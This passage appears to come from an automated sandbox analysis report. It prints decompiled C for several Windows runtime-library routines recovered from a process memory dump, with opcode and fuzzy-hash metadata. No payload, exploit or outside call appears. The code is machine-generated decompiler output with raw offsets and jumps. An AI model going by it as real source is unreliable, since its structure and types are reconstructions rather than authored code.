                                                              														}
                                                              													}
                                                              													_t181 = _v544;
                                                              													if(_t181 != 0) {
                                                              														 *_t181 = 0;
                                                              														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                              														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                              														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                              														if(_v540 == 5) {
                                                              															_t182 = E04B952A5(1);
                                                              															_v588 = _t182;
                                                              															if(_t182 == 0) {
                                                              																E04BAEB70(1, 0x4c879a0);
                                                              																goto L38;
                                                              															} else {
                                                              																_v560 = _t182 + 0xc;
                                                              																_t185 = E04BAAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                              																if(_t185 == 0) {
                                                              																	_t324 = _v588;
                                                              																	goto L97;
                                                              																} else {
                                                              																	_t306 = _v544;
                                                              																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                              																	 *(_t306 + 4) = _t282;
                                                              																	_v576 = _t282;
                                                              																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                              																	 *_t306 = _t325;
                                                              																	if( *_t282 == 0x5c) {
                                                              																		_t149 = _t325 - 2; // -2
                                                              																		_t283 = _t149;
                                                              																		 *_t306 = _t283;
                                                              																		 *(_t306 + 4) = _v576 + 2;
                                                              																		_t185 = _t283 & 0x0000ffff;
                                                              																	}
                                                              																	_t324 = _v588;
                                                              																	 *(_t306 + 2) = _t185;
                                                              																	if((_v548 & 0x00000002) == 0) {
                                                              																		L97:
                                                              																		asm("lock xadd [esi], eax");
                                                              																		if((_t185 | 0xffffffff) == 0) {
                                                              																			_push( *((intOrPtr*)(_t324 + 4)));
                                                              																			E04BD95D0();
                                                              																			L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                              																		}
                                                              																	} else {
                                                              																		 *(_t306 + 0xc) = _t324;
                                                              																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                              																	}
                                                              																	goto L38;
                                                              																}
                                                              															}
                                                              															goto L41;
                                                              														}
                                                              													}
                                                              													L38:
                                                              													_t322 = 0;
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              									L39:
                                                              									if(_t254 !=  &_v532) {
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                              									}
                                                              									_t169 = _t322;
                                                              								}
                                                              								goto L41;
                                                              							}
                                                              							goto L68;
                                                              						}
                                                              					}
                                                              					L41:
                                                              					_pop(_t317);
                                                              					_pop(_t323);
                                                              					_pop(_t255);
                                                              					return E04BDB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                              				} else {
                                                              					_t299 = __edx[2];
                                                              					if( *_t299 == 0x5c) {
                                                              						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                              						if(_t256 != 0x5c) {
                                                              							if(_t256 != 0x3f) {
                                                              								goto L2;
                                                              							} else {
                                                              								goto L50;
                                                              							}
                                                              						} else {
                                                              							L50:
                                                              							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                              								goto L2;
                                                              							} else {
                                                              								_t251 = E04BD3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                              								_pop(_t319);
                                                              								_pop(_t326);
                                                              								_pop(_t257);
                                                              								return E04BDB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                              							}
                                                              						}
                                                              					} else {
                                                              						L2:
                                                              						_t260 = _v572;
                                                              						goto L3;
                                                              					}
                                                              				}
                                                              				L101:
                                                              			}
















































































                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8bba3125d218a29d9b48f5d42154de509c1682bba028bfee4457564e617044e
                                                              • Instruction ID: ac6fcc8bcd0eb42716bbfc15c81ba10cd9f33b9f22d2a9266f2caa4d92cd25b2
                                                              • Opcode Fuzzy Hash: f8bba3125d218a29d9b48f5d42154de509c1682bba028bfee4457564e617044e
                                                              • Instruction Fuzzy Hash: FBF16E706082118FC714CF59C880A7AB7E1FF88708F0489AEF5CACB261E774E955DB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E04BC513A(intOrPtr __ecx, void* __edx) {
                                                              				signed int _v8;
                                                              				signed char _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				char _v28;
                                                              				signed int _v32;
                                                              				signed int _v36;
                                                              				signed int _v40;
                                                              				intOrPtr _v44;
                                                              				intOrPtr _v48;
                                                              				char _v63;
                                                              				char _v64;
                                                              				signed int _v72;
                                                              				signed int _v76;
                                                              				signed int _v80;
                                                              				signed int _v84;
                                                              				signed int _v88;
                                                              				signed char* _v92;
                                                              				signed int _v100;
                                                              				signed int _v104;
                                                              				char _v105;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t157;
                                                              				signed int _t159;
                                                              				signed int _t160;
                                                              				unsigned int* _t161;
                                                              				intOrPtr _t165;
                                                              				signed int _t172;
                                                              				signed char* _t181;
                                                              				intOrPtr _t189;
                                                              				intOrPtr* _t200;
                                                              				signed int _t202;
                                                              				signed int _t203;
                                                              				char _t204;
                                                              				signed int _t207;
                                                              				signed int _t208;
                                                              				void* _t209;
                                                              				intOrPtr _t210;
                                                              				signed int _t212;
                                                              				signed int _t214;
                                                              				signed int _t221;
                                                              				signed int _t222;
                                                              				signed int _t226;
                                                              				intOrPtr* _t232;
                                                              				signed int _t233;
                                                              				signed int _t234;
                                                              				intOrPtr _t237;
                                                              				intOrPtr _t238;
                                                              				intOrPtr _t240;
                                                              				void* _t245;
                                                              				signed int _t246;
                                                              				signed int _t247;
                                                              				void* _t248;
                                                              				void* _t251;
                                                              				void* _t252;
                                                              				signed int _t253;
                                                              				signed int _t255;
                                                              				signed int _t256;
                                                              
                                                              				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                              				_v8 =  *0x4c8d360 ^ _t255;
                                                              				_v32 = _v32 & 0x00000000;
                                                              				_t251 = __edx;
                                                              				_t237 = __ecx;
                                                              				_t212 = 6;
                                                              				_t245 =  &_v84;
                                                              				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                              				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                              				_v48 = __ecx;
                                                              				_v36 = _t207;
                                                              				_t157 = memset(_t245, 0, _t212 << 2);
                                                              				_t256 = _t255 + 0xc;
                                                              				_t246 = _t245 + _t212;
                                                              				if(_t207 == 2) {
                                                              					_t247 =  *(_t237 + 0x60);
                                                              					_t208 =  *(_t237 + 0x64);
                                                              					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                              					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                              					_v104 = _t159;
                                                              					_v76 = _t159;
                                                              					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                              					_v100 = _t160;
                                                              					_v72 = _t160;
                                                              					L19:
                                                              					_v80 = _t208;
                                                              					_v84 = _t247;
                                                              					L8:
                                                              					_t214 = 0;
                                                              					if( *(_t237 + 0x74) > 0) {
                                                              						_t82 = _t237 + 0x84; // 0x124
                                                              						_t161 = _t82;
                                                              						_v92 = _t161;
                                                              						while( *_t161 >> 0x1f != 0) {
                                                              							_t200 = _v92;
                                                              							if( *_t200 == 0x80000000) {
                                                              								break;
                                                              							}
                                                              							_t214 = _t214 + 1;
                                                              							_t161 = _t200 + 0x10;
                                                              							_v92 = _t161;
                                                              							if(_t214 <  *(_t237 + 0x74)) {
                                                              								continue;
                                                              							}
                                                              							goto L9;
                                                              						}
                                                              						_v88 = _t214 << 4;
                                                              						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                              						_t165 = 0;
                                                              						asm("adc eax, [ecx+edx+0x7c]");
                                                              						_v24 = _t165;
                                                              						_v28 = _v40;
                                                              						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                              						_t221 = _v40;
                                                              						_v16 =  *_v92;
                                                              						_v32 =  &_v28;
                                                              						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                              							goto L9;
                                                              						}
                                                              						_t240 = _v48;
                                                              						if( *_v92 != 0x80000000) {
                                                              							goto L9;
                                                              						}
                                                              						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                              						_t226 = 0;
                                                              						_t181 = _t251 + 0x66;
                                                              						_v88 = 0;
                                                              						_v92 = _t181;
                                                              						do {
                                                              							if( *((char*)(_t181 - 2)) == 0) {
                                                              								goto L31;
                                                              							}
                                                              							_t226 = _v88;
                                                              							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                              								_t181 = E04BDD0F0(1, _t226 + 0x20, 0);
                                                              								_t226 = _v40;
                                                              								 *(_t226 + 8) = _t181;
                                                              								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                              								L34:
                                                              								if(_v44 == 0) {
                                                              									goto L9;
                                                              								}
                                                              								_t210 = _v44;
                                                              								_t127 = _t210 + 0x1c; // 0x1c
                                                              								_t249 = _t127;
                                                              								E04BB2280(_t181, _t127);
                                                              								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                              								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                              								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                              								}
                                                              								_t189 = L04BB4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                              								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                              								if(_t189 != 0) {
                                                              									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                              									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                              									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                              									 *_t232 = _t232 + 0x10;
                                                              									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                              									E04BDF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                              									_t256 = _t256 + 0xc;
                                                              								}
                                                              								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                              								E04BAFFB0(_t210, _t249, _t249);
                                                              								_t222 = _v76;
                                                              								_t172 = _v80;
                                                              								_t208 = _v84;
                                                              								_t247 = _v88;
                                                              								L10:
                                                              								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                              								_v44 = _t238;
                                                              								if(_t238 != 0) {
                                                              									 *0x4c8b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                              									_v44();
                                                              								}
                                                              								_pop(_t248);
                                                              								_pop(_t252);
                                                              								_pop(_t209);
                                                              								return E04BDB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                              							}
                                                              							_t181 = _v92;
                                                              							L31:
                                                              							_t226 = _t226 + 1;
                                                              							_t181 =  &(_t181[0x18]);
                                                              							_v88 = _t226;
                                                              							_v92 = _t181;
                                                              						} while (_t226 < 4);
                                                              						goto L34;
                                                              					}
                                                              					L9:
                                                              					_t172 = _v104;
                                                              					_t222 = _v100;
                                                              					goto L10;
                                                              				}
                                                              				_t247 = _t246 | 0xffffffff;
                                                              				_t208 = _t247;
                                                              				_v84 = _t247;
                                                              				_v80 = _t208;
                                                              				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                              					_t233 = _v72;
                                                              					_v105 = _v64;
                                                              					_t202 = _v76;
                                                              				} else {
                                                              					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                              					_v105 = 1;
                                                              					if(_v63 <= _t204) {
                                                              						_v63 = _t204;
                                                              					}
                                                              					_t202 = _v76 |  *(_t251 + 0x40);
                                                              					_t233 = _v72 |  *(_t251 + 0x44);
                                                              					_t247 =  *(_t251 + 0x38);
                                                              					_t208 =  *(_t251 + 0x3c);
                                                              					_v76 = _t202;
                                                              					_v72 = _t233;
                                                              					_v84 = _t247;
                                                              					_v80 = _t208;
                                                              				}
                                                              				_v104 = _t202;
                                                              				_v100 = _t233;
                                                              				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                              					_t237 = _v48;
                                                              					_v105 = 1;
                                                              					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                              						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                              						_t237 = _v48;
                                                              					}
                                                              					_t203 = _t202 |  *(_t251 + 0xb8);
                                                              					_t234 = _t233 |  *(_t251 + 0xbc);
                                                              					_t247 = _t247 &  *(_t251 + 0xb0);
                                                              					_t208 = _t208 &  *(_t251 + 0xb4);
                                                              					_v104 = _t203;
                                                              					_v76 = _t203;
                                                              					_v100 = _t234;
                                                              					_v72 = _t234;
                                                              					_v84 = _t247;
                                                              					_v80 = _t208;
                                                              				}
                                                              				if(_v105 == 0) {
                                                              					_v36 = _v36 & 0x00000000;
                                                              					_t208 = 0;
                                                              					_t247 = 0;
                                                              					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                              					goto L19;
                                                              				} else {
                                                              					_v36 = 1;
                                                              					goto L8;
                                                              				}
                                                              			}
































































                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d71ef0efdf106d9d5634af477e4ab655cf3f0e07f0bb6cf1a2e76a01a674cc01
                                                              • Instruction ID: 99ac29172a3dba1d94d023764fd121a8e19ae198022597a57f408e736bda56ca
                                                              • Opcode Fuzzy Hash: d71ef0efdf106d9d5634af477e4ab655cf3f0e07f0bb6cf1a2e76a01a674cc01
                                                              • Instruction Fuzzy Hash: 42C114756083819FD354CF28C480A5AFBF1BF88308F1489ADF8998B392D771E945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E04B9C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                              				signed int _v8;
                                                              				char _v1036;
                                                              				signed int _v1040;
                                                              				char _v1048;
                                                              				signed int _v1052;
                                                              				signed char _v1056;
                                                              				void* _v1058;
                                                              				char _v1060;
                                                              				signed int _v1064;
                                                              				void* _v1068;
                                                              				intOrPtr _v1072;
                                                              				void* _v1084;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t70;
                                                              				intOrPtr _t72;
                                                              				signed int _t74;
                                                              				intOrPtr _t77;
                                                              				signed int _t78;
                                                              				signed int _t81;
                                                              				void* _t101;
                                                              				signed int _t102;
                                                              				signed int _t107;
                                                              				signed int _t109;
                                                              				signed int _t110;
                                                              				signed char _t111;
                                                              				signed int _t112;
                                                              				signed int _t113;
                                                              				signed int _t114;
                                                              				intOrPtr _t116;
                                                              				void* _t117;
                                                              				char _t118;
                                                              				void* _t120;
                                                              				char _t121;
                                                              				signed int _t122;
                                                              				signed int _t123;
                                                              				signed int _t125;
                                                              
                                                              				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                              				_v8 =  *0x4c8d360 ^ _t125;
                                                              				_t116 = _a4;
                                                              				_v1056 = _a16;
                                                              				_v1040 = _a24;
                                                              				if(E04BA6D30( &_v1048, _a8) < 0) {
                                                              					L4:
                                                              					_pop(_t117);
                                                              					_pop(_t120);
                                                              					_pop(_t101);
                                                              					return E04BDB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                              				}
                                                              				_t70 = _a20;
                                                              				if(_t70 >= 0x3f4) {
                                                              					_t121 = _t70 + 0xc;
                                                              					L19:
                                                              					_t107 =  *( *[fs:0x30] + 0x18);
                                                              					__eflags = _t107;
                                                              					if(_t107 == 0) {
                                                              						L60:
                                                              						_t68 = 0xc0000017;
                                                              						goto L4;
                                                              					}
                                                              					_t72 =  *0x4c87b9c; // 0x0
                                                              					_t74 = L04BB4620(_t107, _t107, _t72 + 0x180000, _t121);
                                                              					_v1064 = _t74;
                                                              					__eflags = _t74;
                                                              					if(_t74 == 0) {
                                                              						goto L60;
                                                              					}
                                                              					_t102 = _t74;
                                                              					_push( &_v1060);
                                                              					_push(_t121);
                                                              					_push(_t74);
                                                              					_push(2);
                                                              					_push( &_v1048);
                                                              					_push(_t116);
                                                              					_t122 = E04BD9650();
                                                              					__eflags = _t122;
                                                              					if(_t122 >= 0) {
                                                              						L7:
                                                              						_t114 = _a12;
                                                              						__eflags = _t114;
                                                              						if(_t114 != 0) {
                                                              							_t77 = _a20;
                                                              							L26:
                                                              							_t109 =  *(_t102 + 4);
                                                              							__eflags = _t109 - 3;
                                                              							if(_t109 == 3) {
                                                              								L55:
                                                              								__eflags = _t114 - _t109;
                                                              								if(_t114 != _t109) {
                                                              									L59:
                                                              									_t122 = 0xc0000024;
                                                              									L15:
                                                              									_t78 = _v1052;
                                                              									__eflags = _t78;
                                                              									if(_t78 != 0) {
                                                              										L04BB77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                              									}
                                                              									_t68 = _t122;
                                                              									goto L4;
                                                              								}
                                                              								_t110 = _v1056;
                                                              								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              								_v1060 = _t118;
                                                              								__eflags = _t110;
                                                              								if(_t110 == 0) {
                                                              									L10:
                                                              									_t122 = 0x80000005;
                                                              									L11:
                                                              									_t81 = _v1040;
                                                              									__eflags = _t81;
                                                              									if(_t81 == 0) {
                                                              										goto L15;
                                                              									}
                                                              									__eflags = _t122;
                                                              									if(_t122 >= 0) {
                                                              										L14:
                                                              										 *_t81 = _t118;
                                                              										goto L15;
                                                              									}
                                                              									__eflags = _t122 - 0x80000005;
                                                              									if(_t122 != 0x80000005) {
                                                              										goto L15;
                                                              									}
                                                              									goto L14;
                                                              								}
                                                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                              								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                              									goto L10;
                                                              								}
                                                              								_push( *((intOrPtr*)(_t102 + 8)));
                                                              								_t59 = _t102 + 0xc; // 0xc
                                                              								_push(_t110);
                                                              								L54:
                                                              								E04BDF3E0();
                                                              								_t125 = _t125 + 0xc;
                                                              								goto L11;
                                                              							}
                                                              							__eflags = _t109 - 7;
                                                              							if(_t109 == 7) {
                                                              								goto L55;
                                                              							}
                                                              							_t118 = 4;
                                                              							__eflags = _t109 - _t118;
                                                              							if(_t109 != _t118) {
                                                              								__eflags = _t109 - 0xb;
                                                              								if(_t109 != 0xb) {
                                                              									__eflags = _t109 - 1;
                                                              									if(_t109 == 1) {
                                                              										__eflags = _t114 - _t118;
                                                              										if(_t114 != _t118) {
                                                              											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              											_v1060 = _t118;
                                                              											__eflags = _t118 - _t77;
                                                              											if(_t118 > _t77) {
                                                              												goto L10;
                                                              											}
                                                              											_push(_t118);
                                                              											_t56 = _t102 + 0xc; // 0xc
                                                              											_push(_v1056);
                                                              											goto L54;
                                                              										}
                                                              										__eflags = _t77 - _t118;
                                                              										if(_t77 != _t118) {
                                                              											L34:
                                                              											_t122 = 0xc0000004;
                                                              											goto L15;
                                                              										}
                                                              										_t111 = _v1056;
                                                              										__eflags = _t111 & 0x00000003;
                                                              										if((_t111 & 0x00000003) == 0) {
                                                              											_v1060 = _t118;
                                                              											__eflags = _t111;
                                                              											if(__eflags == 0) {
                                                              												goto L10;
                                                              											}
                                                              											_t42 = _t102 + 0xc; // 0xc
                                                              											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                              											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                              											_push(_t111);
                                                              											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                              											_push(0);
                                                              											_push( &_v1048);
                                                              											_t122 = E04BD13C0(_t102, _t118, _t122, __eflags);
                                                              											L44:
                                                              											_t118 = _v1072;
                                                              											goto L11;
                                                              										}
                                                              										_t122 = 0x80000002;
                                                              										goto L15;
                                                              									}
                                                              									_t122 = 0xc0000024;
                                                              									goto L44;
                                                              								}
                                                              								__eflags = _t114 - _t109;
                                                              								if(_t114 != _t109) {
                                                              									goto L59;
                                                              								}
                                                              								_t118 = 8;
                                                              								__eflags = _t77 - _t118;
                                                              								if(_t77 != _t118) {
                                                              									goto L34;
                                                              								}
                                                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                              								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                              									goto L34;
                                                              								}
                                                              								_t112 = _v1056;
                                                              								_v1060 = _t118;
                                                              								__eflags = _t112;
                                                              								if(_t112 == 0) {
                                                              									goto L10;
                                                              								}
                                                              								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                              								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                              								goto L11;
                                                              							}
                                                              							__eflags = _t114 - _t118;
                                                              							if(_t114 != _t118) {
                                                              								goto L59;
                                                              							}
                                                              							__eflags = _t77 - _t118;
                                                              							if(_t77 != _t118) {
                                                              								goto L34;
                                                              							}
                                                              							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                              							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                              								goto L34;
                                                              							}
                                                              							_t113 = _v1056;
                                                              							_v1060 = _t118;
                                                              							__eflags = _t113;
                                                              							if(_t113 == 0) {
                                                              								goto L10;
                                                              							}
                                                              							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                              							goto L11;
                                                              						}
                                                              						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              						__eflags = _t118 - _a20;
                                                              						if(_t118 <= _a20) {
                                                              							_t114 =  *(_t102 + 4);
                                                              							_t77 = _t118;
                                                              							goto L26;
                                                              						}
                                                              						_v1060 = _t118;
                                                              						goto L10;
                                                              					}
                                                              					__eflags = _t122 - 0x80000005;
                                                              					if(_t122 != 0x80000005) {
                                                              						goto L15;
                                                              					}
                                                              					L04BB77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                              					L18:
                                                              					_t121 = _v1060;
                                                              					goto L19;
                                                              				}
                                                              				_push( &_v1060);
                                                              				_push(0x400);
                                                              				_t102 =  &_v1036;
                                                              				_push(_t102);
                                                              				_push(2);
                                                              				_push( &_v1048);
                                                              				_push(_t116);
                                                              				_t122 = E04BD9650();
                                                              				if(_t122 >= 0) {
                                                              					__eflags = 0;
                                                              					_v1052 = 0;
                                                              					goto L7;
                                                              				}
                                                              				if(_t122 == 0x80000005) {
                                                              					goto L18;
                                                              				}
                                                              				goto L4;
                                                              			}










































                                                              0x04c07b9f
                                                              0x04c07ba3
                                                              0x00000000
                                                              0x04c07ba3
                                                              0x04c07b66
                                                              0x04c07b68
                                                              0x04c07ae2
                                                              0x04c07ae2
                                                              0x00000000
                                                              0x04c07ae2
                                                              0x04c07b6e
                                                              0x04c07b72
                                                              0x04c07b75
                                                              0x04c07b81
                                                              0x04c07b85
                                                              0x04c07b87
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b31
                                                              0x04c07b34
                                                              0x04c07b3c
                                                              0x04c07b45
                                                              0x04c07b46
                                                              0x04c07b4f
                                                              0x04c07b51
                                                              0x04c07b57
                                                              0x04c07b59
                                                              0x04c07b59
                                                              0x00000000
                                                              0x04c07b59
                                                              0x04c07b77
                                                              0x00000000
                                                              0x04c07b77
                                                              0x04c07b2a
                                                              0x00000000
                                                              0x04c07b2a
                                                              0x04c07af1
                                                              0x04c07af3
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07afb
                                                              0x04c07afc
                                                              0x04c07afe
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b00
                                                              0x04c07b03
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b05
                                                              0x04c07b09
                                                              0x04c07b0d
                                                              0x04c07b0f
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b18
                                                              0x04c07b1d
                                                              0x00000000
                                                              0x04c07b1d
                                                              0x04c07ab7
                                                              0x04c07ab9
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07abf
                                                              0x04c07ac1
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07ac3
                                                              0x04c07ac6
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07ac8
                                                              0x04c07acc
                                                              0x04c07ad0
                                                              0x04c07ad2
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07adb
                                                              0x00000000
                                                              0x04c07adb
                                                              0x04c079d6
                                                              0x04c079d9
                                                              0x04c079dc
                                                              0x04c07a91
                                                              0x04c07a94
                                                              0x00000000
                                                              0x04c07a94
                                                              0x04c079e2
                                                              0x00000000
                                                              0x04c079e2
                                                              0x04c07a74
                                                              0x04c07a7a
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07a8a
                                                              0x04c07a21
                                                              0x04c07a21
                                                              0x00000000
                                                              0x04c07a21
                                                              0x04b9c650
                                                              0x04b9c651
                                                              0x04b9c656
                                                              0x04b9c65c
                                                              0x04b9c65d
                                                              0x04b9c663
                                                              0x04b9c664
                                                              0x04b9c66a
                                                              0x04b9c66e
                                                              0x04c079c5
                                                              0x04c079c7
                                                              0x00000000
                                                              0x04c079c7
                                                              0x04b9c67a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 379dbe91206d2882be7398034d7fa1fd3da8f3a9b282fa20ef2db9ecb2d3ed17
                                                              • Instruction ID: 470b0eae74dbbec8888bb1b58dbc7a8b7264e3f7752056b24301c9d760c41029
                                                              • Opcode Fuzzy Hash: 379dbe91206d2882be7398034d7fa1fd3da8f3a9b282fa20ef2db9ecb2d3ed17
                                                              • Instruction Fuzzy Hash: 408183756062059FDB29CF14C880B7A77E6FB84354F19C86AED459B280E330FE41CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 39%
                                                              			E04C2B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				signed int _t80;
                                                              				signed int _t83;
                                                              				intOrPtr _t89;
                                                              				signed int _t92;
                                                              				signed char _t106;
                                                              				signed int* _t107;
                                                              				intOrPtr _t108;
                                                              				intOrPtr _t109;
                                                              				signed int _t114;
                                                              				void* _t115;
                                                              				void* _t117;
                                                              				void* _t119;
                                                              				void* _t122;
                                                              				signed int _t123;
                                                              				signed int* _t124;
                                                              
                                                              				_t106 = _a12;
                                                              				if((_t106 & 0xfffffffc) != 0) {
                                                              					return 0xc000000d;
                                                              				}
                                                              				if((_t106 & 0x00000002) != 0) {
                                                              					_t106 = _t106 | 0x00000001;
                                                              				}
                                                              				_t109 =  *0x4c87b9c; // 0x0
                                                              				_t124 = L04BB4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                              				if(_t124 != 0) {
                                                              					 *_t124 =  *_t124 & 0x00000000;
                                                              					_t124[1] = _t124[1] & 0x00000000;
                                                              					_t124[4] = _t124[4] & 0x00000000;
                                                              					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                              						L13:
                                                              						_push(_t124);
                                                              						if((_t106 & 0x00000002) != 0) {
                                                              							_push(0x200);
                                                              							_push(0x28);
                                                              							_push(0xffffffff);
                                                              							_t122 = E04BD9800();
                                                              							if(_t122 < 0) {
                                                              								L33:
                                                              								if((_t124[4] & 0x00000001) != 0) {
                                                              									_push(4);
                                                              									_t64 =  &(_t124[1]); // 0x4
                                                              									_t107 = _t64;
                                                              									_push(_t107);
                                                              									_push(5);
                                                              									_push(0xfffffffe);
                                                              									E04BD95B0();
                                                              									if( *_t107 != 0) {
                                                              										_push( *_t107);
                                                              										E04BD95D0();
                                                              									}
                                                              								}
                                                              								_push(_t124);
                                                              								_push(0);
                                                              								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                              								L37:
                                                              								L04BB77F0();
                                                              								return _t122;
                                                              							}
                                                              							_t124[4] = _t124[4] | 0x00000002;
                                                              							L18:
                                                              							_t108 = _a8;
                                                              							_t29 =  &(_t124[0x105]); // 0x414
                                                              							_t80 = _t29;
                                                              							_t30 =  &(_t124[5]); // 0x14
                                                              							_t124[3] = _t80;
